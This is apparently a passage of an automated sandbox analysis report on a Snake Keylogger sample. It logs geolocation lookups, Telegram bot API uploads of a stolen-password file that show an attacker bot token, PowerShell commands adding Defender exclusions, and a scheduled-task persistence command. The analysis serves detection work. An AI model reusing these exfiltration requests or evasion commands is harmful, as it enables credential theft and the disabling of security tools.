                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a84239f0a4642d8-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-24 13:08:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-24 13:08:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            11192.168.2.749727188.114.97.34432916C:\Users\user\Desktop\rPO0977-6745.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-24 13:08:30 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-07-24 13:08:30 UTC707INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:30 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 1261
                                            Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4wnTviRJ6c582R5pwCY3uqO0EeecVcLunEua1e5H6Lr1EF29ZprZGEmPosnAFtpKbp9uYB5X2A7%2FAvkD23CUWpzTBB3jufs%2Fi%2BsvfXrtvXfrYvGb9rl3EtE83MSBBz%2FyZcJIXqWO"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8423ab799e435d-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-24 13:08:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-24 13:08:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            12192.168.2.749728188.114.97.34438004C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-24 13:08:30 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-07-24 13:08:30 UTC705INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:30 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 1261
                                            Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fc6W80WKEbH2Goh3dlcgZkJ4Gb7ib7d4cfQAlzNZXW3Zq0r8qQE9drb7zSkRjYbLvmi9mjjFppEASwnoGio6CpB4W1yCPtjtEaOepgDNzgeFTtyGbwu2rGaWsS9J1Yn%2Ft22Tk24%2B"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8423ac08817cf4-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-24 13:08:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-24 13:08:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            13192.168.2.749730188.114.97.34438004C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-24 13:08:32 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-07-24 13:08:33 UTC703INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:32 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 1263
                                            Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kjxtEAadqvZ1N61WJa9VvG23OovAnn33G61GfvEBmLo7J63rLy2mAvbapC207FMMOpOkPic8Bpv41d37ptMSFFWJ4Uegps00URGqIMR2v1v91nSZZk15Es3J2zFvjvD7Bvk%2B88%2Bz"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8423ba1e6443f7-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-24 13:08:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-24 13:08:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            14192.168.2.749732188.114.97.34438004C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-24 13:08:35 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-07-24 13:08:35 UTC711INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:35 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 1266
                                            Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BAasHM%2BIr%2B%2FqD908lbYNJgWRcgfvxMASgVFsNx5QXnx5Jb3K2GIt65751nEUvmzdcPdzI%2FVm0KriwCBYp8ta3fXAjgmygAGzSJKBg2i1wwBrfgvJHS5nm%2BXvOEyv53ZyhcxLeXNj"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8423cafb0f188d-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-24 13:08:35 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-24 13:08:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            15192.168.2.749735149.154.167.2204432916C:\Users\user\Desktop\rPO0977-6745.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-24 13:08:36 UTC358OUTPOST /bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535403842&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8dcac7a674eafb1
                                            Host: api.telegram.org
                                            Content-Length: 551
                                            Connection: Keep-Alive
                                            2024-07-24 13:08:36 UTC551OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 63 37 61 36 37 34 65 61 66 62 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 30 38 38 37 35 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 34 2f 30 37 2f 32 30 32 34 20 2f 20 30 39 3a 30 38 3a 31 37 0d 0a 43 6c 69 65 6e 74 20
                                            Data Ascii: --------------------------8dcac7a674eafb1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:088753Date and Time: 24/07/2024 / 09:08:17Client
                                            2024-07-24 13:08:36 UTC388INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Wed, 24 Jul 2024 13:08:36 GMT
                                            Content-Type: application/json
                                            Content-Length: 500
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2024-07-24 13:08:36 UTC500INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 32 34 31 38 32 30 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 48 61 70 70 79 62 6f 79 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 48 61 70 70 79 32 35 35 32 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 35 33 35 34 30 33 38 34 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 65 61 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 46 6f 6f 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 38 32 36 35 31 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 53 6e
                                            Data Ascii: {"ok":true,"result":{"message_id":71,"from":{"id":6724182006,"is_bot":true,"first_name":"Happyboybot","username":"Happy25521bot"},"chat":{"id":5535403842,"first_name":"Sea","last_name":"Food","type":"private"},"date":1721826516,"document":{"file_name":"Sn


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            16192.168.2.749740188.114.97.34438004C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-24 13:08:37 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-07-24 13:08:38 UTC715INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:38 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 1269
                                            Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l2Cbl6wxThc7eFFeB6CHZJ8W33VDCd%2B%2BiVtHSKPfyeEyguAeAhM%2B7rF0THyFlvKsBSnPo6zuoMoJexstZHUdq2QikUHdGk%2BaGjh%2Bg%2BmJ%2BhcJI0phtErF%2BIjUQ8ljpoOQSPjliQYR"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8423d9db70424b-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-24 13:08:38 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-24 13:08:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            17192.168.2.749741149.154.167.2204438004C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-24 13:08:43 UTC358OUTPOST /bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535403842&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8dcac9db89d7b60
                                            Host: api.telegram.org
                                            Content-Length: 551
                                            Connection: Keep-Alive
                                            2024-07-24 13:08:43 UTC551OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 63 39 64 62 38 39 64 37 62 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 30 38 38 37 35 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 34 2f 30 37 2f 32 30 32 34 20 2f 20 30 39 3a 30 38 3a 32 31 0d 0a 43 6c 69 65 6e 74 20
                                            Data Ascii: --------------------------8dcac9db89d7b60Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:088753Date and Time: 24/07/2024 / 09:08:21Client
                                            2024-07-24 13:08:44 UTC388INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Wed, 24 Jul 2024 13:08:44 GMT
                                            Content-Type: application/json
                                            Content-Length: 501
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2024-07-24 13:08:44 UTC501INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 32 34 31 38 32 30 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 48 61 70 70 79 62 6f 79 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 48 61 70 70 79 32 35 35 32 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 35 33 35 34 30 33 38 34 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 65 61 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 46 6f 6f 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 38 32 36 35 32 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 53 6e
                                            Data Ascii: {"ok":true,"result":{"message_id":72,"from":{"id":6724182006,"is_bot":true,"first_name":"Happyboybot","username":"Happy25521bot"},"chat":{"id":5535403842,"first_name":"Sea","last_name":"Food","type":"private"},"date":1721826524,"document":{"file_name":"Sn


                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:09:08:16
                                            Start date:24/07/2024
                                            Path:C:\Users\user\Desktop\rPO0977-6745.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\rPO0977-6745.exe"
                                            Imagebase:0xc70000
                                            File size:561'664 bytes
                                            MD5 hash:978148253C4B65B751FCD3CB4713F614
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            Reputation:low
                                            Has exited:true

                                            Target ID:3
                                            Start time:09:08:17
                                            Start date:24/07/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe"
                                            Imagebase:0xa00000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:09:08:17
                                            Start date:24/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:5
                                            Start time:09:08:17
                                            Start date:24/07/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"
                                            Imagebase:0xa00000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:6
                                            Start time:09:08:17
                                            Start date:24/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:7
                                            Start time:09:08:17
                                            Start date:24/07/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp"
                                            Imagebase:0xbe0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:8
                                            Start time:09:08:17
                                            Start date:24/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:9
                                            Start time:09:08:17
